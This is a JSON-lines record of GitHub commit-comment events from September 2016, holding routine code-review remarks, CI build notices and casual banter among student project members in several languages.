{"id":"4548407089","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982430,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:06:52Z","updated_at":"2016-09-12T10:06:52Z","body":"Stay on work, guys !\r\n@moniquemendy @ygopee @RIMSIG @TomWolff93 "}},"created_at":"2016-09-12T10:06:52Z"}
{"id":"4548407507","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982432,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:06:58Z","updated_at":"2016-09-12T10:06:58Z","body":":trollface:"}},"created_at":"2016-09-12T10:06:58Z"}
{"id":"4548408187","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982435,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:07:09Z","updated_at":"2016-09-12T10:07:09Z","body":":trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface::trollface:"}},"created_at":"2016-09-12T10:07:09Z"}
{"id":"4548408710","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982436,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T10:07:15Z","updated_at":"2016-09-12T10:07:15Z","body":":trollface: bof "}},"created_at":"2016-09-12T10:07:15Z"}
{"id":"4548409426","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18982438,"position":null,"line":null,"path":null,"commit_id":"7078b67b3d35a0a404ee9ee1c72a3fe511daba32","created_at":"2016-09-12T10:07:23Z","updated_at":"2016-09-12T10:07:23Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 238](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1194&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:19"}},"created_at":"2016-09-12T10:07:23Z"}
{"id":"4548409428","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18982439,"position":null,"line":null,"path":null,"commit_id":"0c6b715b9add4abcc2c63e75e001cc777cee8f27","created_at":"2016-09-12T10:07:23Z","updated_at":"2016-09-12T10:07:23Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 239](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1195&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T10:07:23Z"}
{"id":"4548410506","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982441,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T10:07:38Z","updated_at":"2016-09-12T10:07:38Z","body":"Let's Go Rush B ! @RadekSowa @TomWolff93  :bangbang: :bangbang: :bangbang: :bangbang: :bangbang:"}},"created_at":"2016-09-12T10:07:38Z"}
{"id":"4548411094","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":18982442,"position":null,"line":null,"path":null,"commit_id":"856379241eae3d12ed3dd534866bf2e5abb0eaaa","created_at":"2016-09-12T10:07:47Z","updated_at":"2016-09-12T10:07:47Z","body":"http://stackoverflow.com/a/1805788/6616813 요것도 한 번 보실래요? "}},"created_at":"2016-09-12T10:07:47Z"}
{"id":"4548412222","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18982447,"position":16,"line":120,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T10:08:04Z","updated_at":"2016-09-12T10:08:04Z","body":"Indeed. The problem is in `ossimSentinel1Model::open()` when errors are generated. The extra space is missing in the error message."}},"created_at":"2016-09-12T10:08:04Z"}
{"id":"4548412254","type":"CommitCommentEvent","actor":{"login":"moniquemendy"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982448,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:08:04Z","updated_at":"2016-09-12T10:08:04Z","body":"le sénégal m'as bien accueillis , je quitte la France les amis "}},"created_at":"2016-09-12T10:08:04Z"}
{"id":"4548414946","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"pariseddy/Montwitter"},"payload":{"comment":{"id":18982453,"position":null,"line":null,"path":null,"commit_id":"9f964b972589fe44c74bde5ae2185cf5e9474a6d","created_at":"2016-09-12T10:08:39Z","updated_at":"2016-09-12T10:08:39Z","body":":underage: bv"}},"created_at":"2016-09-12T10:08:39Z"}
{"id":"4548417174","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"Kunaragi/MyProject"},"payload":{"comment":{"id":18982459,"position":null,"line":null,"path":null,"commit_id":"e81081d381bf0c78589903f1eafbbce22de012a4","created_at":"2016-09-12T10:09:13Z","updated_at":"2016-09-12T10:09:13Z","body":"You're not my teammate, you're a spy from Samsung, go away @ygopee !"}},"created_at":"2016-09-12T10:09:13Z"}
{"id":"4548420296","type":"CommitCommentEvent","actor":{"login":"moniquemendy"},"repo":{"name":"Arod-11/MonProjet"},"payload":{"comment":{"id":18982465,"position":null,"line":null,"path":null,"commit_id":"0c31fd27fad14ba26b829adfb32a3896f061a61d","created_at":"2016-09-12T10:09:58Z","updated_at":"2016-09-12T10:09:58Z","body":"yohan tu n'est pas qualifier pour parler du travail d'autrui :imp:\r\n"}},"created_at":"2016-09-12T10:09:58Z"}
{"id":"4548420960","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"Arod-11/MonProjet"},"payload":{"comment":{"id":18982467,"position":null,"line":null,"path":null,"commit_id":"0c31fd27fad14ba26b829adfb32a3896f061a61d","created_at":"2016-09-12T10:10:09Z","updated_at":"2016-09-12T10:10:09Z","body":"@Arod-11 , j'aime les sushis :sushi:"}},"created_at":"2016-09-12T10:10:09Z"}
{"id":"4548422012","type":"CommitCommentEvent","actor":{"login":"RadekSowa"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982472,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:10:23Z","updated_at":"2016-09-12T10:10:23Z","body":":rowboat::rowboat::rowboat::rowboat: ton bateau monique\r\n"}},"created_at":"2016-09-12T10:10:23Z"}
{"id":"4548422059","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982473,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T10:10:24Z","updated_at":"2016-09-12T10:10:24Z","body":":fu:\n\n2016-09-12 12:06 GMT+02:00 Adrien <notifications@github.com>:\n\n> [image: :trollface:]\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TomWolff93/MyProject/commit/1d09dae746fe918b8674d7ad8eeee7f10f51848e#commitcomment-18982425>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVHsA-xqYdpotKyBqIPlqcECAAfHyPUbks5qpSQsgaJpZM4J6auY>\n> .\n>\n"}},"created_at":"2016-09-12T10:10:24Z"}
{"id":"4548423653","type":"CommitCommentEvent","actor":{"login":"dldhdz"},"repo":{"name":"dldhdz/hello-ya"},"payload":{"comment":{"id":18982476,"position":null,"line":null,"path":null,"commit_id":"d6ccfbd1b3492a845997403cb3d37f45692c26a7","created_at":"2016-09-12T10:10:45Z","updated_at":"2016-09-12T10:10:45Z","body":"I am a robot. I like to catch up all sports news and some events, especially football, F1, tennis, badminton, table tennis, gymnastic and diving. If you are a sport fan, we have a lot to talk about. "}},"created_at":"2016-09-12T10:10:45Z"}
{"id":"4548424808","type":"CommitCommentEvent","actor":{"login":"jeznet"},"repo":{"name":"Tarsnap/spiped"},"payload":{"comment":{"id":18982480,"position":null,"line":null,"path":null,"commit_id":"2c943a9da1cccdde3122d9f49e72fa51ab988ffe","created_at":"2016-09-12T10:11:02Z","updated_at":"2016-09-12T10:11:02Z","body":"@cperciva Would it be now not a good idea to make this file fully converted to Makrdown?"}},"created_at":"2016-09-12T10:11:02Z"}
{"id":"4548429058","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18982489,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-12T10:12:03Z","updated_at":"2016-09-12T10:12:03Z","body":"I guess we need to go from \"People say\" to \"FESCo says\"?\r\n@frenzymadness, can you file an issue on making this simpler? (esptool bugzilla, or fedoralovespython.org issue – not sure what's more appropriate)"}},"created_at":"2016-09-12T10:12:03Z"}
{"id":"4548429263","type":"CommitCommentEvent","actor":{"login":"liuxyc"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":18982491,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-12T10:12:07Z","updated_at":"2016-09-12T10:12:07Z","body":"I didn't have UltiSnips installed, after update the code, i got error \"E117: Unknown function: UltiSnips#SnippetsInCurrentScope\""}},"created_at":"2016-09-12T10:12:07Z"}
{"id":"4548429545","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18982492,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-12T10:12:11Z","updated_at":"2016-09-12T10:12:11Z","body":"Frag mich was leichteres ...\r\nMein Ziel war es, daß E2OpenPlugins/e2openplugin-OpenWebif und oe-alliance/e2openplugin-OpenWebif auch im Status denselben Stand haben, also weder das eine noch das andere \"x commits ahead/y commits behind\" sind, um spätere merges im jeweils anderen repo zu vereinfachen.\r\n\r\nHätte man vermutlich mit git stash besser lösen können, aber durch Zurückdrehen verschwindet ja die Historie auch nicht wieder ...\r\n"}},"created_at":"2016-09-12T10:12:11Z"}
{"id":"4548432886","type":"CommitCommentEvent","actor":{"login":"laurieboyes"},"repo":{"name":"Financial-Times/next-myft-page"},"payload":{"comment":{"id":18982500,"position":null,"line":null,"path":null,"commit_id":"4b0658443c5a76afb355dc33c492d48a2dd7998c","created_at":"2016-09-12T10:12:56Z","updated_at":"2016-09-12T10:12:56Z","body":"👍 "}},"created_at":"2016-09-12T10:12:56Z"}
{"id":"4548432996","type":"CommitCommentEvent","actor":{"login":"rkanavath"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18982501,"position":7,"line":39,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.h","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T10:12:58Z","updated_at":"2016-09-12T10:12:58Z","body":"okay. i move them to a seperate files"}},"created_at":"2016-09-12T10:12:58Z"}
{"id":"4548443805","type":"CommitCommentEvent","actor":{"login":"d00p"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18982538,"position":11,"line":3445,"path":"install/updates/froxlor/0.9/update_0.9.inc.php","commit_id":"4229d8dda4b24b1ba077a602e4aa8420f9e4e521","created_at":"2016-09-12T10:15:32Z","updated_at":"2016-09-12T10:15:32Z","body":"ist doch nur ein default - du kannst die Datei ab sofort gerne nennen wie auch immer du möchtest"}},"created_at":"2016-09-12T10:15:32Z"}
{"id":"4548444106","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18982539,"position":null,"line":null,"path":null,"commit_id":"fe9f79780e1a6dd14e0876dca54ef4d8c8a0a5ae","created_at":"2016-09-12T10:15:34Z","updated_at":"2016-09-12T10:15:34Z","body":"It will shutdown on error, so...."}},"created_at":"2016-09-12T10:15:34Z"}
{"id":"4548445503","type":"CommitCommentEvent","actor":{"login":"owenmcateer"},"repo":{"name":"owenmcateer/Espruino"},"payload":{"comment":{"id":18982542,"position":null,"line":null,"path":null,"commit_id":"02d04664967d654ea7856aa88d1aabd5168fa27d","created_at":"2016-09-12T10:15:54Z","updated_at":"2016-09-12T10:15:54Z","body":"PR created and Travis CI is currently testing https://github.com/espruino/Espruino/pull/919"}},"created_at":"2016-09-12T10:15:54Z"}
{"id":"4548448078","type":"CommitCommentEvent","actor":{"login":"ramyaravindranath"},"repo":{"name":"exercism/x-api"},"payload":{"comment":{"id":18982545,"position":null,"line":null,"path":null,"commit_id":"41a3d356c98fa474f91bc45d320f222854683558","created_at":"2016-09-12T10:16:31Z","updated_at":"2016-09-12T10:16:31Z","body":"@ErikSchierboom No it is not implemented in this. Working on it as a separate PR."}},"created_at":"2016-09-12T10:16:31Z"}
{"id":"4548448462","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18982547,"position":82,"line":82,"path":"app/code/local/Oggetto/Payment/Model/Invoice.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T10:16:37Z","updated_at":"2016-09-12T10:16:37Z","body":"$order->getInvoiceCollection()->getFirstItem()\r\nсразу вернет первый инвойс из коллекции"}},"created_at":"2016-09-12T10:16:37Z"}
{"id":"4548451976","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18982557,"position":80,"line":80,"path":"app/code/local/Oggetto/Payment/Model/Invoice.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T10:17:30Z","updated_at":"2016-09-12T10:17:30Z","body":"опять же, получение ордера нужно делать вне данного метода, иначе у него слишком много функций.."}},"created_at":"2016-09-12T10:17:30Z"}
{"id":"4548455798","type":"CommitCommentEvent","actor":{"login":"marjev"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18982572,"position":null,"line":null,"path":null,"commit_id":"939a3672d4c2f65a6c8d04ebe7cacb621d8a1485","created_at":"2016-09-12T10:18:24Z","updated_at":"2016-09-12T10:18:24Z","body":"@ilozano2 can you explain what the problem might be in more detail?"}},"created_at":"2016-09-12T10:18:24Z"}
{"id":"4548460333","type":"CommitCommentEvent","actor":{"login":"Helgiorn"},"repo":{"name":"Helgiorn/SR5_Ruleset"},"payload":{"comment":{"id":18982578,"position":5,"line":15,"path":"base.xml","commit_id":"e76e2ef4da1b8b6ba5d00599a2d06dd48e6e3635","created_at":"2016-09-12T10:19:32Z","updated_at":"2016-09-12T10:19:32Z","body":"bullshit addon, should be removed"}},"created_at":"2016-09-12T10:19:32Z"}
{"id":"4548461046","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":18982580,"position":3,"line":522,"path":"dnf/conf/config.py","commit_id":"8dd2e59aff4541b2ce7af2fa3dce8342860ee505","created_at":"2016-09-12T10:19:42Z","updated_at":"2016-09-12T10:19:42Z","body":"I think it should be also same when `value == ''`, but not sure. @rpm-software-management/dnf-team thoughts?"}},"created_at":"2016-09-12T10:19:42Z"}
{"id":"4548462105","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18982585,"position":40,"line":40,"path":"app/code/local/Oggetto/Payment/Test/Model/Invoice.php","commit_id":"52fa2e82444ad728bf0c4c96791b54dfad3a5c29","created_at":"2016-09-12T10:19:57Z","updated_at":"2016-09-12T10:19:57Z","body":"имя теста должно быть в третьем лице, т.е. тест что-то делает (тес устанавливает статус инвойса)"}},"created_at":"2016-09-12T10:19:57Z"}
{"id":"4548464747","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18982590,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-12T10:20:33Z","updated_at":"2016-09-12T10:20:33Z","body":"![Szeptember 12. - Hétfő](http://ujlipot.vakvarju.com/data/napimenu/20.jpg?v=1473664760)\nMagyaros zöldborsóleves\r\nRoston csirkemell paradicsommal és füstölt sajttal sütve, párolt zöldségekkel\r\nCsokoládétorta gyümölcsökkel"}},"created_at":"2016-09-12T10:20:33Z"}
{"id":"4548465019","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18982591,"position":null,"line":null,"path":null,"commit_id":"d984423cc00e6a8c483f1570453d61f31f61886d","created_at":"2016-09-12T10:20:36Z","updated_at":"2016-09-12T10:20:36Z","body":"hi, weird: https://github.com/UPBGE/blender/commit/ba0fe4f3d2dd89eac36625e3fc9b93f94f9c2614"}},"created_at":"2016-09-12T10:20:36Z"}
{"id":"4548467776","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18982603,"position":null,"line":null,"path":null,"commit_id":"866737e83062d322d8817ec34aaeff50ff5c627b","created_at":"2016-09-12T10:21:15Z","updated_at":"2016-09-12T10:21:15Z","body":"Ah, something new I can add to my PPA :smile: \r\nAlso see that OctoPrint from @fieldOfView is missing here."}},"created_at":"2016-09-12T10:21:15Z"}
{"id":"4548471969","type":"CommitCommentEvent","actor":{"login":"zhouqin0414"},"repo":{"name":"zhouqin0414/DXTXPaySDKMB"},"payload":{"comment":{"id":18982610,"position":null,"line":null,"path":null,"commit_id":"c1a50de4852f10ce56af9041a613cd42ec505cc7","created_at":"2016-09-12T10:22:17Z","updated_at":"2016-09-12T10:22:17Z","body":"tag-1.0.1"}},"created_at":"2016-09-12T10:22:17Z"}
{"id":"4548472169","type":"CommitCommentEvent","actor":{"login":"mtekel"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":18982611,"position":6,"line":10,"path":"manifests/bosh-manifest/deployments/050-datadog.yml","commit_id":"beb80bc7bb1e79c5c5edf53c660722172c13698a","created_at":"2016-09-12T10:22:20Z","updated_at":"2016-09-12T10:22:20Z","body":"Can't because this depends on pulling datadog yaml files into shared, which is another commit. I think it's OK to have it as is."}},"created_at":"2016-09-12T10:22:20Z"}
{"id":"4548477098","type":"CommitCommentEvent","actor":{"login":"SteveClement"},"repo":{"name":"codeeu/CodeEUCertificates"},"payload":{"comment":{"id":18982615,"position":null,"line":null,"path":null,"commit_id":"93b63dfddbebcc95585a75d3bad6218d479c88bd","created_at":"2016-09-12T10:23:28Z","updated_at":"2016-09-12T10:23:28Z","body":"o_O I missed that…\r\n :("}},"created_at":"2016-09-12T10:23:28Z"}
{"id":"4548479071","type":"CommitCommentEvent","actor":{"login":"keicotu"},"repo":{"name":"keicotu/Bento4"},"payload":{"comment":{"id":18982619,"position":null,"line":null,"path":null,"commit_id":"3fb5b921a1e9f080329479118c395db0744c5609","created_at":"2016-09-12T10:23:55Z","updated_at":"2016-09-12T10:23:55Z","body":"Fix the issue that duplicate AUDs are added when the input H.264 already has AUD. And the output HLS stream or the ts files can't be played normally in Safari/QuickTime player. (the frame display order becomes incorrect.)"}},"created_at":"2016-09-12T10:23:55Z"}
{"id":"4548481388","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18982624,"position":77,"line":77,"path":"app/code/local/Oggetto/Payment/Model/PaymentApi/Payment.php","commit_id":"52fa2e82444ad728bf0c4c96791b54dfad3a5c29","created_at":"2016-09-12T10:24:27Z","updated_at":"2016-09-12T10:24:27Z","body":"обычно, вместо join используется implode"}},"created_at":"2016-09-12T10:24:27Z"}
{"id":"4548483050","type":"CommitCommentEvent","actor":{"login":"micbou"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":18982626,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-12T10:24:47Z","updated_at":"2016-09-12T10:24:47Z","body":"Could you paste the full error message?"}},"created_at":"2016-09-12T10:24:47Z"}
{"id":"4548484730","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18982629,"position":154,"line":154,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T10:25:12Z","updated_at":"2016-09-12T10:25:12Z","body":"Good catch will fix --protocol=tcp issue.\n\nRe : $MYSQL_CLIENT_BIN, I think it is  better to verify mysql client\npackage is installed or not. If it is not installed script terminates with\nmysql client missing error message.\n\n\nOn Mon, Sep 12, 2016 at 3:35 PM, Tomislav Plavcic <notifications@github.com>\nwrote:\n\n> since --protocol=tcp is in use, this will not work if using only socket -\n> it expects hostname/port and that works then.\n> Maybe add it only if port is specified so we know then that we want to use\n> host/port and tcp.\n>\n> [vagrant@localhost test]$ mysql -uroot -S /home/vagrant/test/Percona-XtraDB-Cluster-5.7.14-rel7-26.17.1.Linux.x86_64/node1/socket.sock --protocol=tcp\n> ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (111)\n>\n> Also this doesn't work if you use PXC from binary tarball and \"mysql\"\n> client is not in the PATH for example.\n> ps_tokudb_admin has something like:\n>\n> SCRIPT_PWD=$(cd `dirname $0` && pwd)\n> MYSQL_CLIENT_BIN=\"${SCRIPT_PWD}/mysql\"\n>\n> and then uses $MYSQL_CLIENT_BIN to call binary from wherever it is, but\n> I'm not sure currently where proxysql-admin-tool will be located so maybe\n> this is not a viable request.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Percona-QA/proxysql-admin-tool/commit/3052215c382dff4330ab263cd35e4eb07f424bcf#commitcomment-18982418>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFGU_fDpNO8S_Km_HOZuQ9hB9uxr-OIOks5qpSQCgaJpZM4J6YCa>\n> .\n>\n\n\n\n-- \nBest Regards,\n\n*Ramesh Sivaraman*\n*QA Engineer, Percona*\nhttp://www.percona.com/ <http://percona.com/>\nPhone : +91 8606432991\nSkype : rameshvs02\n"}},"created_at":"2016-09-12T10:25:12Z"}
{"id":"4548487395","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18982635,"position":null,"line":null,"path":null,"commit_id":"913dfecc0f17b3a79dc078274ad151b3e8fecc47","created_at":"2016-09-12T10:25:50Z","updated_at":"2016-09-12T10:25:50Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;8i1JGSqX&#x2F;1981-bug-988038-doc-mention-that-you-can-t-mix-crowbar-and-ceph-deploy\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 988038 - doc: mention that you can&#39;t mix crowbar and ceph-deploy</a>"}},"created_at":"2016-09-12T10:25:50Z"}
{"id":"4548498592","type":"CommitCommentEvent","actor":{"login":"Turing1887"},"repo":{"name":"SunnySunny93/Projekt1"},"payload":{"comment":{"id":18982658,"position":null,"line":null,"path":null,"commit_id":"77e87e9559de1df311536b4be13ca85d543ec4f1","created_at":"2016-09-12T10:28:35Z","updated_at":"2016-09-12T10:28:35Z","body":"#### Turing1887:\r\nHallöle. Ich hab eine Frage zu deiner Ordnerstruktur. Hast du für jede Gruppe jeweils eine Datei erstellt und dann noch mal zusätzlich für die views? Ich blick bei seiner merkwürdigen Struktur irgendwie nicht mehr durch :sweat_smile: "}},"created_at":"2016-09-12T10:28:35Z"}
{"id":"4548499966","type":"CommitCommentEvent","actor":{"login":"annebyrne"},"repo":{"name":"guardian/frontend"},"payload":{"comment":{"id":18982661,"position":4,"line":212,"path":"facia/public/humans.txt","commit_id":"b3f3be9f9668b5c3fa37dce8fe5292cf4d62a7f0","created_at":"2016-09-12T10:28:54Z","updated_at":"2016-09-12T10:28:54Z","body":"You've made yourself an alumni!"}},"created_at":"2016-09-12T10:28:54Z"}
{"id":"4548506358","type":"CommitCommentEvent","actor":{"login":"Panic-Attack"},"repo":{"name":"Panic-Attack/hello-world"},"payload":{"comment":{"id":18982676,"position":null,"line":null,"path":null,"commit_id":"1e344fb374b62c3228a299ed3f460dfe1fb09db5","created_at":"2016-09-12T10:30:29Z","updated_at":"2016-09-12T10:30:29Z","body":"Why did this get changed? it was the best Readme ever :sob: "}},"created_at":"2016-09-12T10:30:29Z"}
{"id":"4548507021","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SchizoDuckie/DuckieTV"},"payload":{"comment":{"id":18982677,"position":null,"line":null,"path":null,"commit_id":"c49274078581e8d5a2404f71661f07700df4d78c","created_at":"2016-09-12T10:30:38Z","updated_at":"2016-09-12T10:30:38Z","body":"Well it does partially fix it, it correctly scrolls in some cases now."}},"created_at":"2016-09-12T10:30:38Z"}
{"id":"4548507443","type":"CommitCommentEvent","actor":{"login":"danpoltawski"},"repo":{"name":"danpoltawski/enrol_autoenrol"},"payload":{"comment":{"id":18982679,"position":null,"line":null,"path":null,"commit_id":"f6f4b3cac63d31fa785c698ef22d55c7465fc227","created_at":"2016-09-12T10:30:45Z","updated_at":"2016-09-12T10:30:45Z","body":"I think that this is still in use on learn.moodle.org (perhaps with some more fixes). @mudrd8mz might know more. We probably should find some time to send a formal pull request"}},"created_at":"2016-09-12T10:30:45Z"}
{"id":"4548508820","type":"CommitCommentEvent","actor":{"login":"cdlm"},"repo":{"name":"demarey/cargo"},"payload":{"comment":{"id":18982682,"position":5,"line":3,"path":"README.md","commit_id":"ea32d3e37c3200a730f80371728ac3d0a6fd008d","created_at":"2016-09-12T10:31:05Z","updated_at":"2016-09-12T10:31:05Z","body":"_lightweight_"}},"created_at":"2016-09-12T10:31:05Z"}
{"id":"4548508825","type":"CommitCommentEvent","actor":{"login":"Dirkflamestuff"},"repo":{"name":"Dirkflamestuff/MI_2016"},"payload":{"comment":{"id":18982683,"position":null,"line":null,"path":null,"commit_id":"ce7d794459015b090dc88797ee73f53a37ab1da6","created_at":"2016-09-12T10:31:06Z","updated_at":"2016-09-12T10:31:06Z","body":"First try to put everything on github"}},"created_at":"2016-09-12T10:31:06Z"}
{"id":"4548516264","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18982714,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-12T10:32:58Z","updated_at":"2016-09-12T10:32:58Z","body":"I like mentioned package solution - so what about make a new package for more general purposes?\r\n\r\nSure, I can fill issue but I am not sure that this can be simpler than add user to group or use sudo."}},"created_at":"2016-09-12T10:32:58Z"}
{"id":"4548519492","type":"CommitCommentEvent","actor":{"login":"SuperflySD"},"repo":{"name":"Lycanit/Trash"},"payload":{"comment":{"id":18982721,"position":null,"line":null,"path":null,"commit_id":"e98a7164bcda39fdae391648ca3cc3c934882ec0","created_at":"2016-09-12T10:33:46Z","updated_at":"2016-09-12T10:33:46Z","body":"What a shit!! fucking shame"}},"created_at":"2016-09-12T10:33:46Z"}
{"id":"4548521877","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18982729,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T10:34:23Z","updated_at":"2016-09-12T10:34:23Z","body":"As far as I know, WGS84 isn't a projection but rather a geodetic datum. (Web-)Mercator seems to be the default."}},"created_at":"2016-09-12T10:34:23Z"}
{"id":"4548525736","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18982742,"position":null,"line":null,"path":null,"commit_id":"0c6b715b9add4abcc2c63e75e001cc777cee8f27","created_at":"2016-09-12T10:35:21Z","updated_at":"2016-09-12T10:35:21Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 239](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1195&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:27:57"}},"created_at":"2016-09-12T10:35:21Z"}
